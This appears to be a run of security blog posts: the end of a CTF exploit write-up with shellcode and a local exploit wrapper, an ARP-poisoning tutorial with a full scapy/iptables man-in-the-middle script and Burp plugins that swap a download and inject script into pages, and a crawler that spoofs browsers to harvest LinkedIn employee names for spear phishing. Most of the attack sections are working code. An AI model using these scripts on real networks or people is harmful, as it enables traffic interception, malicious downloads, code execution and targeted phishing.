#retaddr = struct.pack("<I", 0xfee498c0) 
retaddr = struct.pack("<I", 0xf7e4c881) 
f.write(retaddr * 2**16)
for i in range (0,35000):
    f.write("\x90" * 2**16 + "\xcc" + dashsc)
    f.flush()

f.close()

Here’s the final wrapper. Remember, it needs enough space on the stack to copy all this garbage. I did this by creating tons of environment variables, since something in my environment was throwing an exception when I tried to make a single environment variable much bigger.

#!/usr/bin/python

import os
import argparse
import struct

class exploit:
  def __init__(self, path):
    self.vulnpath = path
 
    #spawns /bin/dash
    dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
    )

    #this give us a relatively close underflow
    arg1 = (18) * "\x31"

    self.payload = arg1
    self.env = { "shell" : "/bin/dash", "format" : "%3$n" }

    #add env padding - 3500 is roughly 100 MB
    #for i in range(0,3500):
    for i in range(0,35000):
        padkey = "pad" + str(i)
        self.env[padkey] = "A" * 2**16

    print "Done padding"

    self.mfile = "command.gdb"

  def rungdb(self):
    #write to command.gdb
    print "no debugging - stack needs too much room"
  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.payload], self.env)


parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
parser.add_argument('path')

args = parser.parse_args()
m = exploit(args.path)
if args.debug:
    m.rungdb()
else:
    m.pwn()

Finally, just run this while redirecting stdin, and if the environment’s right, you should get code execution.

Stage 10

This is the only one I wasn’t able to exploit. I’m not sure this one is exploitable on my Backtrack 5 R2 distro, but I’d love any feedback. There are two exploit paths I can see, and neither one of them has panned out. I eventually gave up because this is something that easily could have been exploitable on their system but not mine, especially since this CTF is from 2004.

First, notice there’s this signal call.

.text:080484F7 push    0Ah             ; handler
.text:080484F9 push    0Ah             ; sig
.text:080484FB call    _signal

when the program is sent a signal (e.g. kill -10), this tells it to start executing code in location 10.

Additionally, the strcpy in 08048516 allows us to overwrite everything on the stack, including the local variables (e.g. the return value of the malloc). Because of this we have an arbitrary overwrite here:


.text:08048520 mov     edx, [ebp+var_malloced]
.text:08048523 mov     eax, edx
.text:08048525 mov     edx, [ebp+arg_4]
.text:08048528 add     edx, 8
.text:0804852B mov     ecx, [edx]
.text:0804852D mov     ebx, ecx
.text:0804852F mov     cl, [ebx]
.text:08048531 mov     [eax], cl       ; eax is var_malloced + counter, cl is also controlleable
.text:08048533 inc     dword ptr [edx]
.text:08048535 inc     [ebp+var_malloced]
.text:08048538 test    cl, cl
.text:0804853A jnz     short loc_804

I’ve ignored the details for now, but it’s clear we can overwrite arbitrary memory with our controlled values. The problem is that immediately after this overwrite there is an infinite loop.

Before trying an exploit in order to simplify things, I tried the following in gdb to see what was possible.

The first thing I tried was to overwrite 0x0000000A. If we could put shellcode here then it would execute when we send our kill. 0x00000000 does seem to be a valid userspace address. For example, we can mmap memory there:

#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/mman.h>

int map_null_page(void) {
	void* mem = (void*)-1;
	size_t length = 100;
	mem = mmap (NULL, length, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|MAP_PRIVATE|MAP_ANON, -1, 0);
	if (mem != NULL) {
		printf("failed\n");
		fflush(0);
		perror("[-] ERROR: mmap");
		return 1;
	}
}

int main (void) {
	map_null_page();
	printf("made it");

}

Setting a breakpoint at the end of this test program, sure enough 0x00 was allocated. Unfortunately, to make use of this memory it has to be mapped. Because mmap can do it, theoretically so can malloc. But if we just try to write to 0 the program will segfault.

Program received signal SIGSEGV, Segmentation fault.
0x08048531 in ?? ()
(gdb) x/i $eip
=> 0x8048531:	mov    %cl,(%eax).
(gdb) info registers
eax            0x0	0
ecx            0xbfffd842	-1073751998
...

I played around with mallocing large sizes (~3GB). This produces out of memory return values (malloc returns 0 when oom), but it would still segfault when I tried to write to 0.

So stepping back, I was trying to figure out how signal kept track of the signal handler. If it’s stored in writable memory, I have an arbitrary overwrite so I could just overwrite that and win. This looked even more promising when I looked at the man 7 signal page:

A process can change the disposition of a signal using sigaction(2) or signal(2). (The latter is less portable when establishing a signal handler; see signal(2) for details.) Using these system calls, a process can elect one of the following behaviors to occur on delivery of the signal: perform the default action; ignore the signal; or catch the signal with a signal handler, a programmer-defined function that is automatically invoked when the signal is delivered. (By default, the signal handler is invoked on the normal process stack. It is possible to arrange that the signal handler uses an alternate stack; see sigaltstack(2) for a discussion of how to do this and when it might be useful.)

This would be great! If the signal function is stored on the process stack, I could overwrite that and win! I compiled a test program


#include <string.h>
#include <unistd.h>
#include <signal.h>

int main (void) {
	int a;
	signal(0xA, 0x47474747);
	while(1) {
	}
}

I attached to the program and searched for 0x47474747, then replaced these with 0x48484848. The idea is if this information really is just in the normal stack then we could overwrite it, and then we win. I was hoping for a segfault at 0x48484848 here (not 0x47474747)

(gdb) list main
2	#include <unistd.h>
3	#include <signal.h>
4	
5	
6	
7	int main (void) {
8		int a;
9		signal(0xA, 0x47474747);
10		printf("made it");
11		while(1) {
(gdb) break 10
Breakpoint 1 at 0x8048431: file signal.c, line 10.
(gdb) run
Starting program: /root/Desktop/defcon/10/test/signal 

Breakpoint 1, main () at signal.c:10
10		printf("made it");
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) n
Program not restarted.
(gdb) shell ps
  PID TTY          TIME CMD
 3125 pts/0    00:00:00 bash
 3280 pts/0    00:08:01 signal
 3379 pts/0    00:00:00 gdb
 3382 pts/0    00:00:00 signal
 3387 pts/0    00:00:00 ps
(gdb) shell cat /proc/3382/maps 
...
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]
(gdb) find /w 0xbffdf000, 0xbfffffff, 0x47474747
0xbffff248
0xbffff380
0xbffff424
3 patterns found.
(gdb) set {int}0xbffff248=0x48484848
(gdb) set {int}0xbffff380=0x48484848
(gdb) set {int}0xbffff424=0x48484848
(gdb) find /w 0xbffdf000, 0xbfffffff, 0x47474747
Pattern not found.
(gdb) find /w 0xbffdf000, 0xbfffffff, 0x48484848
0xbffff248
0xbffff380
0xbffff424
3 patterns found.
(gdb) continue
Continuing.

Program received signal SIGUSR1, User defined signal 1.
main () at signal.c:12
12		}
(gdb) stepi
0x47474747 in ?? ()
(gdp) print $eip
$1 = (void (*)()) 0x47474747

Boo, so that also didn’t work. I also tried memfetch with no additional stuff 0x47474747 stored in writable memory.

In summary, I’ve tried to write directly to address 0xA, and I’ve tried to overwrite the signal handler, but neither seems to have worked. So with this problem I’m stuck. I’m tempted to download Debian 2004 and give it another try. If I do figure it out there (or if I hear any feedback from people who figure out something I missed), I’ll update this post with the solution.

Some Practical ARP Poisoning with Scapy, IPTables, and Burp

ARP poisoning is a very old attack that you can use to get in the middle. A traditional focus of attacks like these is to gather information (whether that information is passwords, auth cookies, CSRF tokens, whatever) and there are sometimes ways to pull this off even against SSL sites (like SSL downgrades and funny domain names). One area I don’t think gets quite as much attention is using man in the middle as an active attack against flaws in various applications. Most of the information is available online, but the examples I’ve seen tend to be piecemeal and incomplete.

Getting an HTTP proxy in the Middle

In this example I’m going to use Backtrack, scapy, and Burp. While there are a lot of cool tools that implement ARP poisoning, like Ettercap and Cain & Abel, it’s straightforward to write your own that’s more precise and easier to see what’s going on.

Here’s a quick (Linux only) script that does several things. 1) it sets up iptables to forward all traffic except destination ports 80 and 443, and it routes 80 and 443 locally 2) at a given frequency, it sends arp packets to a victim that tells the victim to treat it as the gateway IP.

The code is hopefully straightforward. Usage might be python mitm.py –victim=192.168.1.14

from scapy.all import *
import time
import argparse
import os
import sys


def arpPoison(args):
  conf.iface= args.iface
  pkt = ARP()
  pkt.psrc = args.router
  pkt.pdst = args.victim
  try:
    while 1:
      send(pkt, verbose=args.verbose)
      time.sleep(args.freq)
  except KeyboardInterrupt:
    pass  

#default just grabs the default route, http://pypi.python.org/pypi/pynetinfo/0.1.9 would be better
#but this just works and people don't have to install external libs
def getDefRoute(args):
  data = os.popen("/sbin/route -n ").readlines()
  for line in data:
    if line.startswith("0.0.0.0") and (args.iface in line):
      print "Setting route to the default: " + line.split()[1]
      args.router = line.split()[1]
      return
  print "Error: unable to find default route" 
  sys.exit(0)

#default just grabs the default IP, http://pypi.python.org/pypi/pynetinfo/0.1.9 would be better
#but this just works and people don't have to install external libs
def getDefIP(args):
  data = os.popen("/sbin/ifconfig " + args.iface).readlines()
  for line in data:
    if line.strip().startswith("inet addr"):
      args.proxy = line.split(":")[1].split()[0]
      print "setting proxy to: " + args.proxy
      return
  print "Error: unable to find default IP" 
  sys.exit(0)

def fwconf(args):
  #write appropriate kernel config settings
  f = open("/proc/sys/net/ipv4/ip_forward", "w")
  f.write('1')
  f.close()
  f = open("/proc/sys/net/ipv4/conf/" + args.iface + "/send_redirects", "w")
  f.write('0')
  f.close()

  #iptables stuff
  os.system("/sbin/iptables --flush")
  os.system("/sbin/iptables -t nat --flush")
  os.system("/sbin/iptables --zero")
  os.system("/sbin/iptables -A FORWARD --in-interface " +  args.iface + " -j ACCEPT")
  os.system("/sbin/iptables -t nat --append POSTROUTING --out-interface " + args.iface + " -j MASQUERADE")
  #forward 80,443 to our proxy
  for port in args.ports.split(","):
    os.system("/sbin/iptables -t nat -A PREROUTING -p tcp --dport " + port + " --jump DNAT --to-destination " + args.proxy)

parser = argparse.ArgumentParser()
parser.add_argument('--victim', required=True, help="victim IP")
parser.add_argument('--router', default=None)
parser.add_argument('--iface', default='eth1')
parser.add_argument('--fwconf', type=bool, default=True, help="Try to auto configure firewall")
parser.add_argument('--freq', type=float, default=5.0, help="frequency to send packets, in seconds")
parser.add_argument('--ports', default="80,443", help="comma seperated list of ports to forward to proxy")
parser.add_argument('--proxy', default=None)
parser.add_argument('--verbose', type=bool, default=True)

args = parser.parse_args()

#set default args
if args.router == None:
  getDefRoute(args)
if args.proxy == None:
  getDefIP(args)

#do iptables rules
if args.fwconf:
  fwconf(args)

arpPoison(args)

You can see some of what’s happening by dumping the arp tables on the victim machine. In my case, 192.168.1.1 is the gateway I’m spoofing.

after the script is run against the victim, the arp tables are changed to the attacker controlled ‘proxy’ value (by default the attacker machine). In this example it’s easy to see the legitimate gateway at 00:25:9c:4d:b3:cc has been replaced with our attacker machine 00:0c:29:8c:c1:d8.

At this point all traffic routes through us, and our iptables is configured to send ports 80 and 443 to our ‘proxy’. Your proxy should be configured to listen on all interfaces and set to “invisible” mode.

You should be able to see HTTP and HTTPS traffic from the victim routing through Burp. All other traffic (e.g. DNS) should pass through unmodified. Obviously, the ports that are forwarded and whatnot can be pretty easily configured, but this post is focusing on web attacks.

The next few sections of this post are some attacks that can be useful.

Replacing an HTTP Download

It’s very common, even for some of the best security organizations in the world, to allow downloads over HTTP (even in the somewhat rare case that the rest of their site is over HTTPS). You don’t have to look very far to find applications that are able to be downloaded without encryption, and in fact Firefox was the first place I looked. Here’s a stupid example where I use a burp plugin to detect when a user tries to download firefox, and then I replace it with chrome’s setup. I’m not trying to point out any problems with Mozilla – 99% of the internet’s executables seem to be downloaded over HTTP.

The Burp plugin uses this https://github.com/mwielgoszewski/jython-burp-api, which seems pretty cool. This was my first chance using it.

from gds.burp.api import IProxyRequestHandler
from gds.burp.core import Component, implements

class ExamplePlugin(Component):

    implements(IProxyRequestHandler)

    def processRequest(self, request):
        if "Firefox%20Setup%20" in request.url.geturl() and ".exe" in request.url.geturl():
            print "Firefox download detected, redirecting"
            request.host = "131.107.39.100"
            request.raw = ("GET /downloads/Firefox%20Setup%2013.0.1.exe HTTP/1.1\r\n" +
                "HOST: 131.107.39.100\r\n\r\n")


Clientside Attacks

Clientside attacks in the middle can be super interesting, and they include a lot of scenarios that aren’t always possible otherwise. Here’s a non-comprehensive list that comes to mind:

  • XSS in any HTTP site, and sometimes interaction with HTTPS sites if cookies aren’t secure
  • Cookie forcing is possible. E.g. if a CSRF protection compares a post parameter to a cookie then you can set the cookie and perform the CSRF, even if the site is HTTPS only. We talk about this in our CCC talk.
  • Forced NTLM relaying with most domain networks.
  • If XSS is already possible, you can force a victim to make these requests without convincing them to click on a link. This could be useful in targeted internal attacks, like these, that could get shells

Using the same techniques as above, we can write dirty burp plugins that insert Javascript into HTTP responses.

    def processResponse(self, request):
        #very sloppy way to call only once, forcing exception on the first call
        try:
            self.attack += 1
        except:
            script = "<script>alert(document.domain)</script>"
            #simply inject into the first </head> we see
            if "</head>" in request.response.raw:
                print "Beginning Injection..."
                print type(request.response.raw)
                request.response.raw = request.response.raw.replace("</head>", script + "</head>", 1)
                #self.attack = 1


Conclusions

Blah. Blah. Use HTTPS and expensive switches or static ports. Blah. Does this solve the problem, really? Blah. Blah.

I do have a reason for working on this. Can you pwn the corporate network just using ARP poisoning? NTLM relay attacks are freaking deadly, and I’ll be talking about them over the next few weeks, once at work and then at Blackhat as a tool arsenal demo. Man in the middle attacks like these offer a great/nasty way to target that operations guy and get code execution. More on this later.

Linkedin Crawler

The following is also source used in the grad project. I’ll post the actual paper at some point. But here is the linkedin crawler portion with the applicable source. By it’s nature, this code is breakable, and may not work even at the time of posting. But it did work long enough for me to gather addresses, which was the point.

Usage is/was

LinkedinPageGatherer.py Linkedinusername Linkedinpassword

Following is an excerpt from the ‘paper’.

the HTMLParser libraries are more resilient to changes in source. Both HTMLParser and lxml libraries have different code available to process broken HTML. The HTMLParser libraries were chosen as more appropriate for these problems [lxml][htmlparsing].

There has been an effort to put all HTML specific logic in debuggable places so if the HTML generated changes then it is easy to modify the code parsing to reflect those changes (assuming equivalent information is available). However, changes in source are frequent, and the source code has had to be modified roughly every 3 months to reflect changes in HTML layout.

Unfortunately, although the functionality is simple, this program has grown to be much more complex due to roadblocks put in place by both LinkedIn Google.

To search LinkedIn from itself, it is necessary to have a LinkedIn account. With an account, it is possible to search with or without connections, although the searching criteria differ depending on the type of account you have. Because of this, one of the criteria for searching LinkedIn is cookie management, which has to be written to keep track of the HTTP session. In addition, LinkedIn uses a POST parameter nonce at each page that must be retrieved and POSTed for every page submission. Because of the nonce, it is also necessary to login at the login page, save the nonce and the cookie, and proceed to search through the same path an actual user would.

Once the tool is able to search for companies, there is an additional limitation. With the free account, the search is limited to displaying only 100 connections. This is inconvenient as the desired number of actual connections is often much larger. The tool I’ve written takes various criteria (such as location, title, etc) to perform multiple more specific searches of 100 results each. The extra information is harvested at each search to use for later searches. With more specific searches, the tool inserts unique items into a list of users. When the initial search initiates, LinkedIn reports the total number of results (although it only lets the account view 100 at a time) so the tool uses this total number as one possible stopping condition – when a percentage of that number has been reached or a certain number of failed searches have been tried.

This is easier to illustrate with an example. In the case of FPL, there are over 2000 results. However, it can be asserted that at least one of the results is from a certain Miami address. Using this as a search restriction the total results may be reduced to 500, the first 100 of which can be inserted. It can also be asserted that there is at least one result from the Miami address who is a project manager. Using this restriction, there are only 5 results, which have different criteria to do advanced searches on. Using this iterative approach, it is possible to gather most of the 2000. In the program I have written, this functionality is still experimental and the parameters must be adjusted.

One additional difficulty with LinkedIn is that with these results it does not display a name, only a job title associated with the company. Obviously, this is not ideal. A name is necessary for even the most basic spear phishing attacks. An email may sound slightly awkward if addressed as “Dear Project Manager in the Cyber Security Group”. The solution I found to retrieve employee names is to use Google. Using specific Google queries based on the LinkedIn names, it is possible to retrieve the names associated with a job, company, and job title.

Google has a use policy prohibiting automated crawlers. Because of this policy, it does various checks on the queries to verify that the browser is a known real browser. If it is not, Google returns a 403 status stating that the browser is not known. To circumvent this, a packet dump was performed on a valid browser. The code now has a snippet to send information exactly like an actual browser would along with randomized time delays to mimic a person. It should be impossible for Google to tell the difference over the long run – whatever checks they do can be mimicked. The code includes several configurable browsers to masquerade as. Below is the code snippet including the default spoofed browser which is Firefox running on Linux.

def getHeaders(self, browser="ubuntuFF"):
  #ubuntu firefox spoof
  if browser == "ubuntuFF":
    headers = {
      "Host": "www.google.com",
      "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5",
      "Accept" : "text/html,application/xhtml+xml,application xml;q=0.9,*/*;q=0.8",
      "Accept-Language" : "en-us,en;q=0.5",
      "Accept-Charset" : "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
      "Keep-Alive" : "300",
      "Proxy-Connection" : "keep-alive"
    }
...

Although both Google and LinkedIn make it difficult to automate information mining, their approach will fundamentally fail a motivated adversary. Because these companies want to make information available to users, this information can also be retrieved automatically. Captcha technology has been one traditional solution, though by its nature it suffers from similar flaws in design.

The LinkedIn crawler program demonstrates the possibility of an attacker targeting a company to harvest people’s names, which many times can be mapped to email addresses as demonstrated in previous sections.

GoogleQueery.py

#! /usr/bin/python

#class to make google queries
#must masquerade as a legitimate browser
#Using this violates Google ToS

import httplib
import urllib
import sys
import HTMLParser
import re

#class is basically fed a google url for linkedin for the
#sole purpose of getting a linkedin link
class GoogleQueery(HTMLParser.HTMLParser):
  def __init__(self, goog_url):
    HTMLParser.HTMLParser.__init__(self)
    self.linkedinurl = []
    query = urllib.urlencode({"q": goog_url})
    conn = httplib.HTTPConnection("www.google.com")
    headers = self.getHeaders()
    conn.request("GET", "/search?hl=en&"+query, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    self.feed(data)
    self.get_num_results(data)
    conn.close()

  #this is necessary because google wants to be mean and 403 based on... not sure
  #but it seems  I must look like a real browser to get a 200
  def getHeaders(self, browser="chromium"):
    #if browser == "random":
      #TODO randomize choice
    #ubuntu firefox spoof
    if browser == "ubuntuFF":
      headers = {
        "Host": "www.google.com",
        "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5",
        "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language" : "en-us,en;q=0.5",
        "Accept-Charset" : "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
        "Keep-Alive" : "300",
        "Proxy-Connection" : "keep-alive"
        }
    elif browser == "chromium":
      headers = {
        "Host": "www.google.com",
        "Proxy-Connection": "keep-alive",
        "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.5 Safari/533.2",
        "Referer": "http://www.google.com/",
        "Accept": "application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
        "Avail-Dictionary": "FcpNLYBN",
        "Accept-Language": "en-US,en;q=0.8",
        "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3"
      }
    elif browser == "ie":
      headers = {
        "Host": "www.google.com",
        "Proxy-Connection": "keep-alive",
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
        "Referer": "http://www.google.com/",
        "Accept": "application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
        "Accept-Language": "en-US,en;q=0.8",
        "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3"
      }
    return headers

  def get_num_results(self, data):
    index = re.search("<b>1</b> - <b>[d]+</b> of [w]*[ ]?<b>([d,]+)", data)
    try:
      self.numResults = int(index.group(1).replace(",", ""))
    except:
      self.numResults = 0
      if not "- did not match any documents. " in data:
        print "Warning: numresults parsing problem"
        print "setting number of results to 0"

  def handle_starttag(self, tag, attrs):
    try:
      if tag == "a" and ((("linkedin.com/pub/" in attrs[0][1])
                    or  ("linkedin.com/in" in attrs[0][1]))
                    and ("http://" in attrs[0][1])
                    and ("search?q=cache" not in attrs[0][1])
                    and ("/dir/" not in attrs[0][1])):
        self.linkedinurl.append(attrs[0][1])
        #print self.linkedinurl
      #perhaps add a google cache option here in the future
    except IndexError:
      pass

#for testing
if __name__ == "__main__":
  #url = "site:linkedin.com "PROJECT ADMINISTRATOR at CAT INL QATAR W.L.L." "Qatar""
  m = GoogleQueery(url)

LinkedinHTMLParser.py

#! /usr/bin/python

#this should probably be put in LinkedinPageGatherer.py

import HTMLParser

from person_searchobj import person_searchobj

class LinkedinHTMLParser(HTMLParser.HTMLParser):
  """
  subclass of HTMLParser specifically for parsing Linkedin names to person_searchobjs
  requires a call to .feed(data), stored data in the personArray
  """
  def __init__(self):
    HTMLParser.HTMLParser.__init__(self)
    self.personArray = []
    self.personIndex = -1
    self.inGivenName = False
    self.inFamilyName = False
    self.inTitle = False
    self.inLocation = False

  def handle_starttag(self, tag, attrs):
    try:
      if tag == "li" and attrs[0][0] == "class" and ("vcard" in attrs[0][1]):
        self.personIndex += 1
        self.personArray.append(person_searchobj())
      if attrs[0][1] == "given-name" and self.personIndex >=0:
        self.inGivenName = True
      elif attrs[0][1] == "family-name" and self.personIndex >= 0:
        self.inFamilyName = True
      elif tag == "dd" and attrs[0][1] == "title" and self.personIndex >= 0:
        self.inTitle = True
      elif tag == "span" and attrs[0][1] == "location" and self.personIndex >= 0:
        self.inLocation = True
    except IndexError:
      pass

  def handle_endtag(self, tag):
    if tag == "span":
      self.inGivenName = False
      self.inFamilyName = False
      self.inLocation = False
    elif tag == "dd":
      self.inTitle = False

  def handle_data(self, data):
    if self.inGivenName:
      self.personArray[self.personIndex].givenName = data.strip()
    elif self.inFamilyName:
      self.personArray[self.personIndex].familyName = data.strip()
    elif self.inTitle:
      self.personArray[self.personIndex].title = data.strip()
    elif self.inLocation:
      self.personArray[self.personIndex].location = data.strip()

#for testing - use a file since this is just a parser
if __name__ == "__main__":
  import sys
  file = open ("test.htm")
  df = file.read()
  parser = LinkedinHTMLParser()
  parser.feed(df)
  print "================"
  for person in parser.personArray:
    print person.goog_printstring()
  file.close()

LinkedinPageGatherer.py – this is what should be called directly.

#!/usr/bin/python

import urllib
import urllib2
import sys
import time
import copy
import pickle
import math

from person_searchobj import person_searchobj
from LinkedinHTMLParser import LinkedinHTMLParser
from GoogleQueery import GoogleQueery

#TODO add a test function that tests the website format for easy diagnostics when HTML changes
#TODO use HTMLParser like a sane person
class LinkedinPageGatherer:
  """
  class that generates the initial linkeding queeries using the company name
  as a search parameter. These search strings will be searched using google
  to obtain additional information (these limited initial search strings usually lack
  vital info like names)
  """
  def __init__(self, companyName, login, password, maxsearch=100,
               totalresultpercent=.7, maxskunk=100):
    """
    login and password are params for a valid linkedin account
    maxsearch is the number of results - linkedin limit unpaid accounts to 100
    totalresultpercent is the number of results this script will try to find
    maxskunk is the number of searches this class will attempt before giving up
    """
    #list of person_searchobj
    self.people_searchobj = []
    self.companyName = companyName
    self.login = login
    self.password = password
    self.fullurl = ("http://www.linkedin.com/search?search=&company="+companyName+
                    "&currentCompany=currentCompany", "&page_num=", "0")
    self.opener = self.linkedin_login()
    #for the smart_people_adder
    self.searchSpecific = []
    #can only look at 100 people at a time. Parameters used to narrow down queries
    self.total_results = self.get_num_results()
    self.maxsearch = maxsearch
    self.totalresultpercent = totalresultpercent
    #self.extraparameters = {"locationinfo" : [], "titleinfo" : [], "locationtitle" : [] }
    #extraparameters is a simple stack that adds keywords to restrict the search
    self.extraparameters = []
    #TODO can only look at 100 people at a time - like to narrow down queries
    #and auto grab more
    currrespercent = 0.0
    skunked = 0
    currurl = self.fullurl[0] + self.fullurl[1]
    extraparamindex = 0

    while currrespercent < self.totalresultpercent and skunked <= maxskunk:
      numresults = self.get_num_results(currurl)
      save_num = len(self.people_searchobj)

      print "-------"
      print "currurl", currurl
      print "percentage", currrespercent
      print "skunked", skunked
      print "numresults", numresults
      print "save_num", save_num

      for i in range (0, int(min(math.ceil(self.maxsearch/10), math.ceil(numresults/10)))):
        #function adds to self.people_searchobj
        print "currurl" + currurl + str(i)
        self.return_people_links(currurl + str(i))
      currrespercent = float(len(self.people_searchobj))/self.total_results
      if save_num == len(self.people_searchobj):
        skunked += 1
      for i in self.people_searchobj:
        pushTitles = [("title", gName) for gName in i.givenName.split()]
        #TODO this could be inproved for more detailed results, etc, but keeping it simple for now
        pushKeywords = [("keywords", gName) for gName in i.givenName.split()]
        pushTotal = pushTitles[:] + pushKeywords[:]
        #append to extraparameters if unique
        self.push_search_parameters(pushTotal)
      print "parameters", self.extraparameters
      #get a new url to search for, if necessary
      #use the extra params in title, "keywords" parameters
      try:
        refineel = self.extraparameters[extraparamindex]
        extraparamindex += 1
        currurl = self.fullurl[0] + "&" + refineel[0] + "=" + refineel[1] + self.fullurl[1]
      except IndexError:
        break

  """
  #TODO: This idea is fine, but we should get names first to better distinguish people
  #also maybe should be moved
  def smart_people_adder(self):
    #we've already done a basic search, must do more
    if "basic" in self.searchSpecific:
  """
  def return_people_links(self, linkedinurl):
    req = urllib2.Request(linkedinurl)
    fd = self.opener.open(req)
    pagedata = ""
    while 1:
      data = fd.read(2056)
      pagedata = pagedata + data
      if not len(data):
        break
    #print pagedata
    self.parse_page(pagedata)

  def parse_page(self, page):
    thesePeople = LinkedinHTMLParser()
    thesePeople.feed(page)
    for newperson in thesePeople.personArray:
      unique = True
      for oldperson in self.people_searchobj:
        #if all these things match but they really are different people, they
        #will likely still be found as unique google results
        if (oldperson.givenName == newperson.givenName and
            oldperson.familyName == newperson.familyName and
            oldperson.title == newperson.title and
            oldperson.location == oldperson.location):
              unique = False
              break
      if unique:
        self.people_searchobj.append(newperson)
  """
    print "======================="
    for person in self.people_searchobj:
      print person.goog_printstring()
  """

  #return the number of results, very breakable
  def get_num_results(self, url=None):
    #by default return total in company
    if url == None:
      fd = self.opener.open(self.fullurl[0] + "1")
    else:
      fd = self.opener.open(url)
    data = fd.read()
    fd.close()
    searchstr = "<p class="summary">"
    sindex = data.find(searchstr) + len(searchstr)
    eindex = data.find("</strong>", sindex)
    return(int(data[sindex:eindex].strip().strip("<strong>").replace(",", "").strip()))

  #returns an opener object that contains valid cookies
  def linkedin_login(self):
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
    urllib2.install_opener(opener)
    #login page
    fd = opener.open("https://www.linkedin.com/secure/login?trk=hb_signin")
    data = fd.read()
    fd.close()
    #csrf 'prevention' login value
    searchstr = """<input type="hidden" name="csrfToken" value="ajax:"""
    sindex = data.find(searchstr) + len(searchstr)
    eindex = data.find('"', sindex)
    params = urllib.urlencode(dict(csrfToken="ajax:-"+data[sindex:eindex],
                              session_key=self.login,
                              session_password=self.password,
                              session_login="Sign+In",
                              session_rikey=""))
    #need the second request to get the csrf stuff, initial cookies
    request = urllib2.Request("https://www.linkedin.com/secure/login")
    request.add_header("Host", "www.linkedin.com")
    request.add_header("Referer", "https://www.linkedin.com/secure/login?trk=hb_signin")
    time.sleep(1.5)
    fd = opener.open(request, params)
    data = fd.read()
    if "<div id="header" class="guest">" in data:
      print "Linkedin authentication faild. Please supply a valid linkedin account"
      sys.exit(1)
    else:
      print "Linkedin authentication Successful"
    fd.close()
    return opener

  def push_search_parameters(self, extraparam):
    uselesswords = [ "for", "the", "and", "at", "in"]
    for pm in extraparam:
      pm = (pm[0], pm[1].strip().lower())
      if (pm not in self.extraparameters) and (pm[1] not in uselesswords) and pm != None:
        self.extraparameters.append(pm)

class LinkedinTotalPageGather(LinkedinPageGatherer):
  """
  Overhead class that generates the person_searchobjs, using GoogleQueery
  """
  def __init__(self, companyName, login, password):
    LinkedinPageGatherer.__init__(self, companyName, login, password)
    extraPeople = []
    for person in self.people_searchobj:
      mgoogqueery = GoogleQueery(person.goog_printstring())
      #making the assumption that each pub url is a unique person
      count = 0
      for url in mgoogqueery.linkedinurl:
        #grab the real name from the url
        begindex = url.find("/pub/") + 5
        endindex = url.find("/", begindex)
        if count == 0:
          person.url = url
          person.name = url[begindex:endindex]
        else:
          extraObj = copy.deepcopy(person)
          extraObj.url = url
          extraObj.name = url[begindex:endindex]
          extraPeople.append(extraObj)
        count += 1
      print person
    print "Extra People"
    for person in extraPeople:
      print person
      self.people_searchobj.append(person)

if __name__ == "__main__":
  #args are email and password for linkedin
  my = LinkedinTotalPageGather(company, sys.argv[1], sys.argv[2])

person_searchobj.py

#! /usr/bin/python

class person_searchobj():
  """this object is used for the google search and the final person object"""

  def __init__ (self, givenname="", familyname="", title="", organization="", location=""):
    """
    given name could be a title in this case, does not matter in terms of google
    but then may have to change for the final person object
    """
    #"name" is their actual name, unlike givenName and family name which are linkedin names
    self.name = ""
    self.givenName = givenname
    self.familyName = familyname
    self.title = title
    self.organization = organization
    self.location = location

    #this is retrieved by GoogleQueery
    self.url = ""

  def goog_printstring(self):
    """return the google print string used for queries"""
    retrstr = "site:linkedin.com "
    for i in  [self.givenName, self.familyName, self.title, self.organization, self.location]:
      if i != "":
        retrstr += '"' + i +'" '
    return retrstr

  def __repr__(self):
    """Overload __repr__ for easy printing. Mostly for debugging"""
    return (self.name + "n" +
            "------n"
            "GivenName: " + self.givenName + "n" +
            "familyName:" + self.familyName + "n" +
            "Title:" + self.title + "n" +
            "Organization:" + self.organization + "n" +
            "Location" + self.location + "n" +
            "URL:" + self.url + "nn")

email_spider

This was a small part of a project that was itself about 1/3 of my graduate project. I used it to collect certain information. Here is the excerpt from the paper.

Website Email Spider Program

In order to automatically process publicly available email addresses, a simple tool was developed, with source code available in Appendix A. An automated tool is able to process web pages in a way that is less error prone than manual methods, and it also makes processing the sheer number of websites possible (or at least less tedious).
